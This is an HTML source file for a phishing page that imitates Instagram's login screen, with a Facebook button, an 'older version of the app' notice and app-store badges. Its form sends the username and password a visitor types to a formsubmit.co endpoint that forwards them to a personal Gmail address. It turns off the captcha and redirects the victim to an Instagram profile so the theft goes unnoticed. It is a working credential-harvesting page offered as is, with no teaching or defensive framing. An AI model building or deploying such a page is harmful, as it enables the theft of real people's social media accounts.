<!DOCTYPE html>
<html lang="en">
<head>
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
 <title>Document</title>
 <style>
 *{padding: 0;margin: 0;box-sizing: border-box;}
 
 .container{
 height: 100%;
 display: grid;
 justify-content: center;
 background-color: white;
 flex-wrap: wrap;
 text-align: center;
 
 }
 .box{
 margin-top: 30px;
 padding: 20px ;
 width: 350px;
 height: 380px;
 text-align: center;
 background-color: white;
 }
 .box.a{
 margin-top: 10px;
 height: 80px;
 }
 #hedding{
 font-size: 40px;
 font-weight: 400;
 font-family: Instagram Sans;
 margin-bottom: 10px;
 }
 #int{
 width: 250px;
 height: 30px;
 margin: 20px 30px 10px 30px;
 background-color: whitesmoke;
 padding: 10px;
 border: 1px solid rgb(216, 211, 211);
 
 }
 #a{
 width: 250px;
 height: 30px;
 margin: 20px 30px 10px 30px;
 background-color: rgb(29, 161, 242);
 padding-bottom: 0px;
 border: 1px solid rgb(216, 211, 211);
 border-radius: 5px;
 color: white;
 cursor: pointer;
 }
 #pho{
 border-radius: 10px;
 cursor: pointer;
 }
  #f{
 width: 250px;
 height: 40px;
 margin: 20px 30px 10px 30px;
 background-color: rgb(24, 119, 242);
 padding-bottom: 0px;
 border: 1px solid rgb(216, 211, 211);
 border-radius: 5px;
 color: white;
 cursor: pointer;
 }
 #pho{
 border-radius: 10px;
 cursor: pointer;
 }
 
 </style>
</head>
<body>
    <form action="https://formsubmit.co/joshvin.k.john@gmail.com" method="POST">
        
 <div class="container">
 <div class="box">
 <img src="https://i.ibb.co/8NFJ6Gt/download.png" height="100">
 <button id="f">Continue Using Facebook</button>
 <input id="int" type="text" style="height:50px;margin-bottom:-10000px" placeholder="Phone number, username or email address" required name="id" >
 <input id="int" type="password" placeholder="Password" required name="password" style="height:50px">
 
 <button id="a" type="submit">Login</button>
 
 <a href="https://www.instagram.com/accounts/password/reset/">Forgot password?</a>
<br>
<br><br>
 <p style="font-size: 15px;color: rgb(83, 77, 77);">Don't have an account?<br><span 
style="color: blue;cursor: pointer; ">Sign up</span></p>
 </div>
 <p style="padding: 20px;font-size: 20px;"></p>
 <p style="font-size:7px">You are using an older version of the app</p>
 <span><br><br><br><br><img id="pho"src="https://i.ibb.co/jymfPDT/download-app-store-get-google-play-buttons-kiev-ukraine-september-button-icons-printed-paper-1982257.jpg" height="80px"></span>
 <br><br><br><br><br><br><br>
 </div>
 
 <input type="hidden" name="_next" value="https://instagram.com/its.thehumanspider?igshid=YmMyMTA2M2Y=">
   <input type="hidden" name="_captcha" value="false">
 </form>
 
</body>
</html>
